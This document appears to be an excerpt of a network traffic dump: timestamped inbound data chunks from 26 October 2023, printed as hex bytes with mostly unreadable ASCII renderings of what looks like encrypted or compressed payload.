                                                                              2023-10-26 07:45:59 UTC1583INData Raw: d5 49 4b b8 e1 94 26 22 d5 f8 ae 77 fb e7 d6 b6 8a ed 4d 26 d4 55 b7 ea e1 72 d3 d5 23 c2 cc d6 43 b4 03 a8 d4 f1 2d 38 b3 08 08 18 10 f4 8f 4d ae 41 5f 78 30 24 fc 88 bd 40 96 af 3f 35 eb 7b 59 07 ab e0 95 ba 6a c3 b1 23 d9 a9 d6 3c e6 37 b0 d1 c7 84 95 fa 0a dc 55 35 0b 54 39 a2 aa 31 8b e1 c3 77 32 97 ed 28 aa 10 f5 03 10 3c c3 d7 fb 36 73 fd 29 47 49 f8 0d 9d bd 07 74 e8 85 8a 7d b2 d4 d4 14 ba 5d a6 74 9c b3 77 64 1c 7c cc 88 bd ac b7 13 c9 a8 7e 95 80 e7 aa 8e e8 c4 df c2 e9 7c 5e 45 ff c1 77 8f 8b 8a ad e7 61 a8 c4 c6 51 40 db 85 92 aa ee 70 42 d0 07 d4 7c 56 fa 09 73 3e 8e 55 77 ee d7 a9 d8 28 38 5e 41 0f 78 02 fa 4a 43 f0 21 42 58 e7 06 46 19 54 d4 da 69 20 d2 85 21 74 ea f6 25 ef 3d fc 12 71 65 85 e4 9a 3b eb af 81 d1 ea 52 16 9a d2 64 e1 39 f3
                                                                              Data Ascii: IK&"wM&Ur#C-8MA_x0$@?5{Yj#<7U5T91w2(<6s)GIt}]twd|~|^EwaQ@pB|Vs>Uw(8^AxJC!BXFTi !t%=qe;Rd9
                                                                              2023-10-26 07:45:59 UTC1599INData Raw: 4b 62 2f 42 45 47 0b 11 20 c2 98 4e 5e 82 09 ef e2 ef ff 9a c4 89 66 b8 b6 d4 46 78 0b f1 0b c3 14 22 69 52 55 e8 d8 73 cf 79 82 f8 ef c7 72 82 c9 50 b0 17 7b e4 2a 66 c2 3e db 17 62 0d 9b c7 34 40 07 39 89 e2 5b ad 78 5a af 5b f2 32 e9 e3 c7 e1 4a 46 6b e3 c8 45 96 3c e9 37 a7 12 8e 45 ab 81 72 3a c6 68 0e 94 cf b8 7a 61 a7 32 6b f9 5d de b7 0d 6c 53 6f 49 09 06 cb 9d e2 8d 9b 63 50 62 85 8f 56 c3 b7 9a 74 88 40 27 f4 95 ae 21 0d 3f ed 7c 9e 80 68 5b 27 f6 ca 2a 73 10 ef 9f d4 9b ca 17 05 7c 4f 7d a5 dc a8 e4 77 10 1b 18 6d c9 ac 31 81 02 ab d3 f0 d2 ce 00 68 af 95 98 f0 b7 1b 3b 8c 11 3f 38 59 38 cc 4c dc 41 1e cf b3 e1 47 e1 1a e2 4a e8 62 bc e2 f3 c8 16 2b 90 0c 86 50 a8 d4 a3 b1 e7 d4 01 93 f9 f3 88 d7 e2 10 b4 8d f1 5c b0 7b 8f 76 dc 14 d7 f0 01 3a
                                                                              Data Ascii: Kb/BEG N^fFx"iRUsyrP{*f>b4@9[xZ[2JFkE<7Er:hza2k]lSoIcPbVt@'!?|h['*s|O}wm1h;?8Y8LAGJb+P\{v:
                                                                              2023-10-26 07:45:59 UTC1615INData Raw: 43 c5 34 4f 54 43 66 6b bf ea 6a 9e 02 21 5a d8 7d 8b aa 87 5f ec ce b8 81 36 cb c8 a9 5e af 77 96 66 0a ea 8a 63 0a fa 31 a0 ca 52 5c 22 59 74 5a ee b8 1f ec ee d6 29 74 3e f9 79 6c 37 65 2d e8 41 b3 57 72 15 14 03 63 1c 4b a0 52 89 1b 06 c6 41 6a 13 4a 6c 6c f4 c2 c1 be 54 e9 66 bc 57 b3 76 38 d1 db e1 c4 2f ae 32 b4 57 b4 e0 92 23 34 f0 3b 01 7b 55 98 72 0d 59 4d 0a c4 01 5e 30 94 49 45 09 14 64 6a 67 9e b8 1d 7a 74 bd 7e cd b0 01 64 10 b4 dc 2f 0a b4 63 56 f6 bd c4 45 35 45 63 0a 9b 3e d3 0e f8 aa 62 83 a8 7b be d2 a1 c2 3f eb 51 4b 4a 79 47 c9 0e eb 55 9a 02 ea ed 74 cc b3 25 dc 81 70 19 63 89 9c b7 f2 53 cd 97 51 c8 2a 20 42 82 92 29 f9 a4 7b 58 cb 16 ef 57 7c 59 44 bc 54 56 5a 17 bc 21 da 03 d4 d4 83 6a 54 8b 09 aa 2d ee ff db 54 c0 13 a8 23 9a ca
                                                                              Data Ascii: C4OTCfkj!Z}_6^wfc1R\"YtZ)t>yl7e-AWrcKRAjJllTfWv8/2W#4;{UrYM^0IEdjgzt~d/cVE5Ec>b{?QKJyGUt%pcSQ* B){XW|YDTVZ!jT-T#
                                                                              2023-10-26 07:45:59 UTC1631INData Raw: c6 5d 81 8a af 68 ca 1e f9 22 b5 27 4a a2 1d 99 e1 c1 ec 09 3d e8 74 ff 74 a8 80 5a 50 9a 10 bc f9 e3 47 d9 a4 e1 62 98 e5 4c 8d 18 b4 d4 b8 76 86 49 db 77 a3 ec 42 57 d0 ed 0c c4 a5 54 22 38 97 ee 06 6b 8b a6 4b f0 93 dd 0a 3f ae 42 d2 57 72 77 8d 47 a6 c1 d7 3c 58 c0 f0 62 24 08 4b 37 24 e7 62 ed 34 82 5a 2f e8 c1 58 38 7d d3 3b 9f f3 b2 d6 39 81 8a 93 24 a4 41 c3 54 83 c0 fb 41 c1 3e 2b fb f9 36 bb bc 30 c2 7f d4 14 82 f6 e6 bc 21 a9 e4 16 d2 03 9d 0f c0 8a f1 f5 8a 42 7e b9 f8 0a d8 f8 cd a7 44 81 e2 dc 57 c4 19 cb 7b f4 bb aa e8 7d 91 dd 5e d6 d5 4a e3 fb 7e 29 81 c6 61 ae c1 c2 de 3b 11 54 ab ff ba 54 5e 36 1f d2 72 48 19 b4 9d 00 31 d4 b9 e2 17 12 97 b4 40 9b 22 ef 45 76 cd 58 97 64 c2 90 75 c0 d1 4a 7c 01 c6 40 50 c3 0b f3 37 e3 d8 45 73 03 ad d2
                                                                              Data Ascii: ]h"'J=ttZPGbLvIwBWT"8kK?BWrwG<Xb$K7$b4Z/X8};9$ATA>+60!B~DW{}^J~)a;TT^6rH1@"EvXduJ|@P7Es
                                                                              2023-10-26 07:45:59 UTC1647INData Raw: cf 71 4a 01 0f 23 95 40 d4 6c 37 e5 f6 b7 6a 78 cb f0 59 2a 16 e9 5a 18 0c a4 e8 ae c7 68 38 15 bc c1 78 03 c9 f8 7d 21 34 d3 08 36 92 22 a5 e4 54 04 f0 5f 29 8c 76 0f 26 42 16 da b4 32 9a 4e 8f c2 06 e0 54 e4 57 a3 6b 86 d5 a3 74 53 77 21 09 9b 29 f1 b4 88 d1 59 74 c6 38 98 54 72 36 46 e8 45 8b 53 18 43 76 18 63 67 6e 03 5a 58 90 f9 94 7e 38 1c d4 f4 a4 1b 89 84 aa 75 9d d9 8a 50 95 de 8a c0 ad 8b 74 8a fe a4 00 78 54 bf fe 9f 10 b7 ea f7 d1 65 c4 0f b2 04 2a 11 ce a2 be 97 f2 8a 86 95 89 bf 9c f7 a8 de c4 b7 fc 39 cd bf 64 51 a8 1c 61 da ea 50 76 c4 87 38 c0 f1 11 24 b4 e6 69 62 95 26 ab ed f4 a4 0a 47 94 02 51 f2 a7 29 eb a2 a5 d9 4a f6 b4 a8 4b 72 55 c1 4f 58 32 fd 9c 85 a1 68 ca fb fc 4f ba 01 96 6c 09 5f d2 74 4f 61 a9 5a db b7 0c 14 a4 e8 f4 72 e2
                                                                              Data Ascii: qJ#@l7jxY*Zh8x}!46"T_)v&B2NTWktSw!)Yt8Tr6FESCvcgnZX~8uPtxTe*9dQaPv8$ib&GQ)JKrUOX2hOl_tOaZr
                                                                              2023-10-26 07:45:59 UTC1663INData Raw: 01 55 60 ef cc 22 2b 8b b8 61 0d b6 bf f1 0a bd 33 75 7c d3 64 62 00 f7 53 b1 b6 d6 30 82 28 ba 14 bf 9e 77 f0 d0 b1 23 e2 3c ea f7 16 ed b8 14 5b ca bf 90 34 58 9b 13 3c c2 99 37 db 7f b2 9a 14 6d 8f c5 c0 16 d0 d7 77 4e 0b 65 4e 64 62 5f bf cb fe ac 6a c2 c5 d8 14 39 73 13 d4 61 3f 7c ff 9e ff af c3 40 fa 77 60 b0 dd e6 94 a2 6e 71 bf 52 66 0f 25 87 ea 41 88 42 eb 09 f8 a3 8c 57 45 83 4f 58 54 0f eb a2 0c ac 59 08 83 ef 76 37 6f 11 63 38 db 23 aa 5f 39 56 9a 17 0d ef 0d 45 74 22 dc 5a 44 b2 e9 fb e9 39 f8 4c 71 69 d3 d7 f2 db ef 87 64 d1 4c f8 54 32 72 f3 e2 89 09 01 35 66 d5 27 c2 1e c3 91 6c 82 9e 37 d4 8d 14 a2 83 02 73 80 af 61 41 55 6e f0 6f 96 88 62 eb 91 c5 4c 42 71 f4 1d 6b 63 94 5b 64 98 63 9c f0 69 3b b8 8a f3 34 61 1d 00 14 a2 97 fb fc 25 72
                                                                              Data Ascii: U`"+a3u|dbS0(w#<[4X<7mwNeNdb_j9sa?|@w`nqRf%ABWEOXTYv7oc8#_9VEt"ZD9LqidLT2r5f'l7saAUnobLBqkc[dci;4a%r
                                                                              2023-10-26 07:45:59 UTC1679INData Raw: c0 4a 21 38 59 cc c2 ad bd 40 43 22 db 4f d3 a6 55 f4 ca e3 14 a5 b8 01 0e 71 73 d6 c8 15 0b 34 11 79 cb 37 56 b0 ba 06 21 bd 50 de 34 15 80 28 b4 ca 2b 1d 70 03 4b 39 ff a1 25 62 37 0e c5 aa 94 60 db 2e f4 50 90 75 e8 7a 42 78 d0 79 47 18 14 a3 8a 7e fb 5a fa 98 7b 99 41 b8 f4 7f a5 e9 d0 32 35 02 b4 61 f9 3b 64 ed 76 8b ee 87 12 51 d7 10 5f f8 f8 4e bc f1 cb e0 c0 17 e6 51 ff ca 5e c3 88 d8 e7 a0 67 d5 c8 01 6e f8 0a f4 46 78 e4 4e ba ef b8 e5 c7 ff d4 73 fb 88 4d 6e 99 f3 b1 a8 b3 d3 54 d4 90 b2 14 9d 43 78 14 91 78 6c 55 b7 c8 63 74 67 ce f7 94 b2 f8 95 8e 91 dc d1 a0 21 e8 08 3d fc c4 8e 34 11 cc c7 34 dc cd 5c 08 31 13 33 4f c2 1a c4 7c d9 9b f7 94 f9 68 5b 91 a1 59 a3 bb 61 36 fc 74 d1 2a 98 c1 8e b5 85 c5 6b cd 89 45 6b de c7 70 e2 de e2 4c c2 a2
                                                                              Data Ascii: J!8Y@C"OUqs4y7V!P4(+pK9%b7`.PuzBxyG~Z{A25a;dvQ_NQ^gnFxNsMnTCxxlUctg!=44\13O|h[Ya6t*kEkpL
                                                                              2023-10-26 07:45:59 UTC1695INData Raw: d4 cc d7 d7 5c 62 ed 24 ff 40 0e 97 f6 9f 8f 78 cd 74 a6 d1 f8 36 15 d4 34 18 80 3c 34 4e c0 79 04 23 dd 78 cd 2d db 25 98 02 69 41 20 cf 0a ae 6b 0d 6b 33 60 0c cf f7 48 42 97 0d bb 6f ea 99 93 76 a7 ce 4c 26 6e f3 23 65 bb bb 74 7d 23 c4 a5 49 8b 7a 4c e2 00 f1 77 9f 17 f8 5a 62 52 f8 4b d3 e0 58 84 3e a8 e2 7c 6e 2e 47 04 3b 6b e2 b2 e9 38 5a e4 d6 f5 f5 39 e2 de 2c 94 c2 e9 5f 56 7c e9 39 e2 87 39 d3 ee cb 0f 9c 14 ba 0b 6a 1f ca 2a 09 d9 54 fe 39 83 84 4a 73 bf c9 0a 4e 02 aa 4c d8 0d 64 44 38 64 a9 e6 4f 9f 90 3e d8 d2 55 ca 80 08 6c db 5e 07 0f eb ef fb cc 9d 52 14 64 aa 7d 9d 39 2b 55 48 13 42 58 66 38 8a 7a 0c 47 12 f0 34 15 fa 19 dd d1 c3 0d 39 02 a0 57 34 63 11 17 fb 66 9f cd fc 94 ea 8e 59 41 fb 57 1b 2e c9 f0 51 52 87 09 64 84 7a f4 7d 40 2b
                                                                              Data Ascii: \b$@xt64<4Ny#x-%iA kk3`HBovL&n#et}#IzLwZbRKX>|n.G;k8Z9,_V|99j*T9JsNLdD8dO>Ul^Rd}9+UHBXf8zG49W4cfYAW.QRdz}@+
                                                                              2023-10-26 07:45:59 UTC1711INData Raw: 21 85 09 5f ef db 80 98 0b 7c 7e b8 11 e2 04 ec 6e a4 6a 58 07 62 0a 19 47 8e c0 96 0b c1 c2 e9 fc b4 0c 04 8b 52 b2 57 84 52 96 7c ac 09 a7 3a 35 e6 27 98 f2 76 41 33 9f ca 8a ec e4 e0 99 1f 7f aa 6a 62 12 fc 0a 73 1d 16 7b f6 f3 80 92 7b a7 9d aa 7c 78 83 66 b6 b3 f0 6a 7b df f5 8a 2d e2 76 39 38 95 aa 6a d9 7b ed 6a 38 d4 3e 86 79 f0 9a 12 31 e7 52 cb 58 b5 75 2a c6 ba 6f 85 d8 67 85 f2 c8 2f ea 01 a1 70 bd 57 e3 99 69 0a 9f 75 34 f5 25 3c c2 fb 94 f4 4f 51 fc be ab cb f8 ca 7f 02 9c 74 38 00 2d e7 ac 16 3a 5c 63 dc 25 47 47 7b 18 3b a0 f1 bf d4 fc 76 59 ed 30 da a4 ef c6 59 93 79 11 b3 57 1c 88 c6 8a 90 82 ea 41 08 34 0c d3 00 a2 ea 37 1c 6d 47 d1 53 7f 8f 7f cc 41 ea cb 71 ed 62 07 50 e9 ea 51 4b 84 ef 89 ff 33 8b 09 14 92 68 39 cd 28 ff 6f 0f 33 55
                                                                              Data Ascii: !_|~njXbGRWR|:5'vA3jbs{{|xfj{-v98j{j8>y1RXu*og/pWiu4%<OQt8-:\c%GG{;vY0YyWA47mGSAqbPQK3h9(o3U
                                                                              2023-10-26 07:45:59 UTC1727INData Raw: 1b ec b6 24 93 5f 56 58 b1 f9 60 21 48 4a c0 94 84 fa 6a 64 c2 3b 04 1c f2 d4 bb 9f 0f c5 26 18 a1 1b 13 4f c9 21 29 a8 16 1e cb 89 04 0e eb 2d b9 a9 28 78 b8 85 a7 e3 14 84 b4 3b 00 84 70 18 6c 8f 11 ed 05 02 8e c3 d4 a8 6b 23 88 82 da 6c a6 d2 93 88 8a 1e 29 60 42 ed 2a d8 77 80 bc 94 a9 87 4e 98 80 00 4b 78 49 74 c6 a1 13 b7 ff 51 3d 62 79 32 9c 59 be f5 8c f2 ca 70 81 50 0b 2e d4 c1 c3 28 f3 07 4a 6f 13 48 fd 1e 0a fa 4a 63 e0 e1 4d 7f db 71 4b f1 03 64 f0 15 09 3b c8 2e 34 e2 57 6c 09 53 c9 77 db f8 f9 9b 8f dd 21 34 8c a2 c0 89 f0 71 62 a3 b0 41 31 61 5a 2a 2b eb f5 73 aa d4 19 8d 91 cd 71 42 6c 9f 69 c2 30 51 26 c2 a9 5f 41 f4 03 dc 34 49 e9 3c 6d eb 89 64 01 39 41 f8 f4 bb 58 5f a9 e9 a3 e8 13 a1 52 b9 54 79 c1 55 fc 41 ca f8 d8 8f 43 58 aa 90 e5
                                                                              Data Ascii: $_VX`!HJjd;&O!)-(x;plk#l)`B*wNKxItQ=by2YpP.(JoHJcMqKd;.4WlSw!4qbA1aZ*+sqBli0Q&_A4I<md9AX_RTyUACX
                                                                              2023-10-26 07:45:59 UTC1743INData Raw: c6 a3 7a e8 b4 66 0c 17 66 f6 39 5a 94 01 99 b7 fb 68 03 9f 83 be aa 7b c2 a5 cd 46 32 db 99 c9 75 64 34 63 2a 22 9b 3c 94 8c e8 28 a8 fa 5f b1 4a c6 4a 5c 84 7b 8a 0e 08 23 2b af d1 2f a7 57 b4 a3 fb 93 97 df 4a 38 21 9a ae 1f 8d 70 58 ff 23 f1 b7 d7 34 bb 6c 5f 48 93 ae f7 b8 e3 9b 56 62 12 6b 78 05 c2 0a 0f 88 e2 c3 18 f3 e5 5f 6a ba ea c6 a4 c3 24 1f 01 63 5f bd 3e 92 a2 c2 55 40 7c d5 5f 0f 3a 88 c0 14 ba a1 06 ee e0 3d 2e b9 9b 19 98 2d ea 18 ad 49 e2 58 67 5b c2 09 68 e4 52 58 d6 12 02 8f cc d4 b2 a7 86 15 97 1c 58 43 a4 e4 88 fc 95 49 b8 b2 90 2f 78 3c d0 ae 39 f2 7f a5 10 bf 3d 0b c0 9c 88 ac 26 dd 02 fa e5 2d 22 d3 77 7a 78 a3 0c 74 95 af 1e 03 a2 49 2b e4 3a 99 9c e2 dc 89 0c 8c e2 03 5e 97 0f 08 58 1b c2 55 de 54 55 da 49 dd 41 83 38 fc 0f e9
                                                                              Data Ascii: zff9Zh{F2ud4c*"<(_JJ\{#+/WJ8!pX#4l_HVbkx_j$c_>U@|_:=.-IXg[hRXXCI/x<9=&-"wzxtI+:^XUTUIA8
                                                                              2023-10-26 07:45:59 UTC1759INData Raw: 05 d0 6a aa ec 92 05 94 ed 66 b4 6a 54 d9 be e8 56 1c 0b bc 80 b7 fa 59 4a a6 dc bf 21 cf 6a b8 5a db ff 2a 51 62 fd aa 5e 74 40 f8 ee ce a4 63 f4 81 8c 04 79 ec c3 46 2b 22 cb 9d bf 46 0f b7 d5 61 0b da d4 f3 c2 7c 04 3c 1f 18 43 a2 c4 67 94 60 b7 f6 0f 91 ca c3 94 55 36 f0 b4 4f 71 18 cf c7 bb 62 63 b6 58 c7 d6 0f 19 98 a7 c1 ca 5e 49 b1 6f d6 32 c2 b0 47 54 b3 66 fa a7 a9 8a cc cd e1 2a 99 b3 b5 f8 57 70 b7 4c 76 63 54 e4 b7 ef b0 1d 17 49 d2 ea f6 3f 1b 7c 30 14 69 ba 8a 19 23 26 f4 54 15 aa f3 90 a2 21 71 c8 a6 29 98 ba 8b 50 78 d4 b6 43 19 49 c2 ea 98 0a bf 4c 6f bd 48 f9 a9 5c 5f 13 2a 51 00 ea a8 11 bc 40 62 d1 a1 88 1e 67 b8 d7 65 52 ad 92 58 38 0a ab 0a 6a 42 7b bc cf b9 6a df 99 e2 0a 74 9d 2c a1 ac 5b 22 74 b4 e4 26 0e f0 44 82 08 40 3e 42 ec
                                                                              Data Ascii: jfjTVYJ!jZ*Qb^t@cyF+"Fa|<Cg`U6OqbcX^Io2GTf*WpLvcTI?|0i#&T!q)PxCILoH\_*Q@bgeRX8jB{jt,["t&D@>B
                                                                              2023-10-26 07:45:59 UTC1775INData Raw: c3 61 e6 5e 14 aa ea 79 c4 52 09 f9 be f3 30 45 4c c2 ea 08 0e 7a a1 6a f5 c6 15 a7 10 b2 ea e4 48 a2 48 c4 cf 5a c1 b6 30 aa 28 ff 62 d3 9a 87 79 ee a3 e8 fb e4 0f ca e0 b6 b9 17 7c 2b b9 18 61 35 cc 7f 2b 59 62 2d a1 fa ea 32 8b 22 eb a4 7e 64 cd 68 4c 34 b5 8b 8f 62 bf f9 f4 bb 49 d8 88 7f aa 2c e1 33 18 a1 b5 81 ba f7 bd 31 7b a2 85 f8 ea 03 16 c9 ed b7 f2 4f 5f b8 f0 36 14 55 5a c1 ea 5a 21 0a 90 55 66 80 98 17 dd 62 bc 6a 55 e2 6a 91 b5 ac ea 98 d0 ba 4e 3d 4b 7b d3 79 dc 4b 12 16 a9 dd 9c 77 f4 96 b0 f8 ee ba bf 7e 24 79 c0 38 69 66 bd 7c 59 8b 54 31 54 7e bb d7 14 94 6a c7 2a d7 d2 37 e2 9c 4b 9e d0 41 ec 74 47 53 d4 95 04 cf 46 08 f0 43 4a 7c 3e 52 65 0f 6f 40 6a 18 f5 9f c0 af b4 f2 a2 1a 7e 8f 68 fc d4 9b 40 7c 54 ba 3b 7c 99 34 32 f8 1a 06 0b
                                                                              Data Ascii: a^yR0ELzjHHZ0(by|+a5+Yb-2"~dhL4bI,31{O_6UZZ!UfbjUjN=K{yKw~$y8if|YT1T~j*7KAtGSFCJ|>Reo@j~h@|T;|42
                                                                              2023-10-26 07:45:59 UTC1787INData Raw: 06 fa 06 4c 89 59 74 13 e5 e1 6a 94 fd aa 5a 58 03 67 af 37 df 82 ba 37 f7 a0 c9 e4 94 87 16 c3 f4 92 52 74 4a 90 d6 db 71 8e 0a 04 71 a9 2f 3c c2 e9 db e0 33 82 f9 86 ef 4f 23 18 c8 81 66 fe 7d e7 2a 73 73 a2 03 22 09 66 ea da e4 5f 31 cc 0d 18 cb 53 34 7d 33 ac d4 7b a5 28 34 52 87 87 fa 8b 36 6d 9c 58 d0 72 f4 2b 32 d8 11 b4 2a 88 25 5a b6 57 e4 82 bd 3f 34 89 27 a2 34 a1 01 a5 94 54 3b 81 9a a6 ea 5f d6 62 61 24 27 da 16 38 e4 8a bb c3 64 5f 69 ea 63 d9 1e 78 4a bf 07 8a 0d c9 d2 a5 e2 21 8e 58 27 98 f1 51 45 b7 2a a6 3b 42 d5 cf b4 f3 fc ab d4 23 80 73 0b 0b ea 5f cc 81 0a a2 b2 47 eb 64 cb ab 89 f6 d3 3c 49 11 5d 3c 6b 07 dc 81 c3 07 0e c7 75 aa 15 3a 4b 57 b4 cf ae 37 11 ba da 6f 49 31 a5 0e 1d 80 ca 5c f3 67 17 78 85 21 97 18 e2 b7 c2 94 94 23 d0
                                                                              Data Ascii: LYtjZXg77RtJqq/<3O#f}*ss"f_1S4}3{(4R6mXr+2*%ZW?4'4T;_ba$'8d_icxJ!X'QE*;B#s_Gd<I]<ku:KW7oI1\gx!#
                                                                              2023-10-26 07:45:59 UTC1791INData Raw: 40 e2 fc 3f 7d e2 69 56 0c 7b f9 94 20 40 f5 39 62 59 e5 4c ca a1 63 fa 54 4b 0a 89 84 63 07 36 4c 77 4e 47 72 fb 8a 7c 58 bf 18 67 89 e3 ea f6 96 8e 6a 48 14 15 ab 58 12 65 43 d4 6a 5d 2c fc 48 51 8f b8 40 f9 41 58 f0 71 37 03 40 62 09 44 e2 a1 48 e6 12 cf ff 70 a5 13 4b 3c 9b 3e 63 d8 a6 a6 5e d8 48 82 04 32 36 3d ee 77 a8 03 97 d8 70 45 7e b9 74 a6 e8 6f c8 88 3d 53 4c a2 85 a0 94 b0 9c 7b 34 85 16 a5 74 53 ef 13 e4 58 49 0f 5a ea 0a 29 af c8 c6 37 0d a0 71 18 aa a1 a4 37 46 6d 4a 39 c7 8c ca 2b d4 61 40 e3 6c c5 76 7b a6 c5 84 84 74 d1 98 17 c6 46 66 ca 54 89 3a 14 4e 62 a7 53 a8 a1 f1 03 e8 43 cb 97 48 db dc 26 3d 6f 7a f8 18 df ce 97 30 a2 4a 57 f2 79 56 e8 f1 07 67 f2 8f 44 eb a7 14 a6 aa ea b3 78 bf da 54 6e 83 68 4c 68 56 00 f8 61 3f b8 7b df f7
                                                                              Data Ascii: @?}iV{ @9bYLcTKc6LwNGr|XgjHXeCj],HQ@AXq7@bDHpK<>c^H26=wpE~to=SL{4tSXIZ)7q7FmJ9+a@lv{tFfT:NbSCH&=oz0JWyVgDxTnhLhVa?{
                                                                              2023-10-26 07:45:59 UTC1807INData Raw: b4 a1 57 e9 5e a2 f0 98 97 46 dc c1 74 82 fb 10 38 70 0e 2d 0e 41 70 13 54 42 bc 69 64 c2 ed 66 cf 0a 60 18 72 66 01 38 74 78 bf e7 14 55 ce 13 86 22 2b 6b d3 f4 88 be be 21 eb 26 2f 8d be 98 17 86 b6 71 f4 e9 fb 1a 80 a2 68 a9 8e e6 0a 1c 74 62 8f 00 db 4d 81 80 0a 49 8f 39 f6 81 ea a3 07 9e de 05 6c ff 76 37 76 6e 6a 8e b4 71 ea 3d f2 87 48 26 42 10 7a 65 69 c6 85 98 bc 4a 0c d1 34 42 0e a6 22 22 95 38 f4 63 8b 0b c1 76 d7 91 07 c6 80 72 f4 5c 2a 7a 19 b7 47 d8 2c 02 63 e7 15 81 c9 a1 14 4c 7e 78 76 d0 0b aa 18 b4 07 a2 1a 8a d5 d7 f3 c7 00 0b 7d 82 e8 d2 5c c9 2b 5c c7 a1 e1 75 cf a2 0a d8 48 b3 04 01 f3 fd 5e ef 53 d3 ca 90 2a c0 ea 88 a0 85 11 b8 61 83 84 99 34 46 03 a2 0f cf 9a c6 37 a2 81 dd 18 c1 ab 97 15 b9 dc 37 5a 43 14 0d 33 41 6a d8 6b 0d ba
                                                                              Data Ascii: W^Ft8p-ApTBidf`rf8txU"+k!&/qhtbMI9lv7vnjq=H&BzeiJ4B""8cvr\*zG,cL~xv}\+\uH^S*a4F77ZC3Ajk
                                                                              2023-10-26 07:45:59 UTC1819INData Raw: 1b 45 86 58 53 a2 ca 37 8b e1 b9 57 61 c0 ea 77 2c 39 59 84 a2 61 c1 5f a8 1d 45 f4 ee 91 e9 18 1b ab 2e ac 63 6d 3d 2e c0 e1 7a 79 ff 95 20 9b 6a 56 b6 65 50 42 b1 2f dd 83 9f fb d4 21 8b e0 02 45 b1 ed 8c 42 03 26 7b 31 80 60 3d 52 aa 2a 03 62 51 9e 42 ec f4 38 d5 76 ee 37 4c 3e 73 82 74 70 15 3a 4f 6d 45 fc ef aa aa 17 7d 84 e8 3c 42 41 70 73 aa 16 53 98 07 9e b4 5d 44 3f 6b 2d c3 bc 36 07 cb 41 86 18 b4 fd 13 a5 8f 05 6b f4 fc 51 ae 9b fc 6b 0b 24 d4 57 d1 e5 ed 01 38 09 36 f8 f4 cb 5a 63 ac 65 54 2c 01 a7 b3 a1 82 fe cc 74 aa b7 95 8b 91 20 63 69 01 e8 5d be c1 e2 44 82 f4 97 52 d8 e1 d8 d9 a8 fe 11 1c a2 ea df 1a 3d 44 99 63 61 ea 40 dc 7c 81 f6 00 ad 52 b0 74 64 ea 68 a0 3b 20 02 ec 03 2b b0 d4 fa 06 7e a8 3d 3d f4 f6 21 eb 53 bb 87 d5 67 49 ed bb
                                                                              Data Ascii: EXS7Waw,9Ya_E.cm=.zy jVePB/!EB&{1`=R*bQB8v7L>stp:OmE}<BApsS]D?k-6AkQk$W86ZceT,t ci]DR=Dca@|Rtdh; +~==!SgI
                                                                              2023-10-26 07:45:59 UTC1835INData Raw: d5 41 6b 10 f0 7d c7 68 ad 83 7d f8 06 46 cb 38 f4 81 a7 52 a3 68 b8 c3 7c 70 74 fe 78 da 5c c9 54 4a 72 a0 c7 46 b0 93 7c 62 59 78 0c 0b 75 14 01 65 7c f9 e2 71 cb 05 d8 01 14 27 53 df 5a 38 b4 8c e4 28 14 39 0e 1b 14 43 c5 63 16 e2 4a 3d 10 d0 e3 5e 6f 01 6b 91 7d 91 4b 55 a7 a1 ab de f2 71 5b ed 24 b4 d2 77 6d 0e 3d 6d f4 c2 bf 27 f3 c1 37 de f5 02 8d 25 a4 a1 a6 6b 9d ad ae 37 f2 c8 0a a9 18 97 27 12 25 39 c2 59 44 f8 a9 c1 45 40 1e f9 14 06 c9 55 15 12 2b 92 fd 48 d8 74 b8 a6 a8 57 c6 36 a3 a7 94 25 64 65 58 fa 6d c4 34 bf eb 37 64 f4 a7 4f 74 ba 50 da 02 6c 97 e3 f1 d8 4a 71 0a cb 42 5b 84 e2 aa ee 94 da ea 39 92 84 a2 84 1b e0 86 f3 51 09 ea d7 6b 78 c4 c8 2d 80 e4 f7 b4 84 6d 98 88 90 43 78 d1 9b f9 ab 19 96 9f 5b f2 b3 91 51 a1 eb e3 98 da 36 04
                                                                              Data Ascii: Ak}h}F8Rh|ptx\TJrF|bYxue|q'SZ8(9CcJ=^ok}KUq[$wm=m'7%k7'%9YDE@U+HtW6%deXm47dOtPlJqB[9Qkx-mCx[Q6
                                                                              2023-10-26 07:45:59 UTC1851INData Raw: 9c e2 72 16 18 82 ea 56 5b b3 15 1a 89 dc ca b0 74 f8 34 f8 b2 05 33 9b 50 38 07 dd 05 75 9d be 13 77 dc cf f0 81 04 5a 20 c2 77 38 22 e6 6a d0 74 2a 3f 9c 58 7e 7d 27 11 a9 53 58 19 e3 60 08 12 02 eb 6b 4a 80 02 3d 73 7f ed 37 8d 73 9e eb 72 a2 96 2d 7a 62 ca 87 9b 04 93 8e ad 50 0a 90 50 0a 3a 58 05 c4 aa 5c e3 06 e9 d0 f0 01 13 eb 6f d3 40 b0 5a bd 8d 7c 8a 80 e9 df 14 99 ca 57 05 54 08 2d 85 6b aa ee f0 01 7f 9f 34 ba 5d 8c 14 a9 3d 59 46 42 94 6c a9 46 75 39 02 c2 27 04 00 86 3f e0 6d 22 cf 8d 55 58 aa 70 d4 08 4f 98 b4 0e 8a 88 04 35 8f ec 7f a2 0d b8 0c 42 82 16 bf 81 7a d8 8d e0 4a c7 64 60 84 f0 79 42 e6 39 7c 82 f1 3c 8d 7e aa f9 1c 96 79 2f 7b 42 1f f8 1b c2 b3 a7 82 4c 02 a2 f5 88 77 f1 14 3d ab 66 b2 81 88 38 80 fb 6d 88 82 f4 45 61 4c 71 0b
                                                                              Data Ascii: rV[t43P8uwZ w8"jt*?X~}'SX`kJ=s7sr-zbPP:X\o@Z|WT-k4]=YFBlFu9'?m"UXpO5BzJd`yB9|<~y/{BLw=f8mEaLq
                                                                              2023-10-26 07:45:59 UTC1867INData Raw: 66 06 ab a3 f3 85 aa 5d 0c 34 13 39 f2 5e 4a 07 54 d9 03 5b 17 81 fe dd 0f 9f eb e7 10 3e e0 44 30 c2 f1 a8 24 94 51 bc 54 7b 00 3a f2 e4 7f c7 76 da 1e 18 e1 84 8f 3c 14 ff 12 e4 f4 61 83 f1 6d dd fb b0 a7 d8 2a 38 15 3d f0 2a a1 99 cc b7 74 06 39 71 73 e9 cb 1f f4 1b 56 06 e4 47 eb 9c fe b1 45 dc f6 45 c1 8e 84 dc 48 d2 c8 21 be 58 76 ca da 67 f9 7f 3e e8 71 ce 66 eb 34 e1 6d 48 f0 f8 dc 21 a0 0b 94 6c 94 4f cb af ac 95 6c 38 13 f7 75 e7 f4 34 86 3d 8c e8 cc 5e 10 e4 d0 f7 07 07 d3 41 54 65 ba a7 0a c9 dd 62 3c b7 b5 38 66 a2 71 a0 c9 9e 0d 78 c6 4f ab b7 07 fb 96 6f da d6 50 38 1d 14 eb 0c bd 63 0a 59 99 99 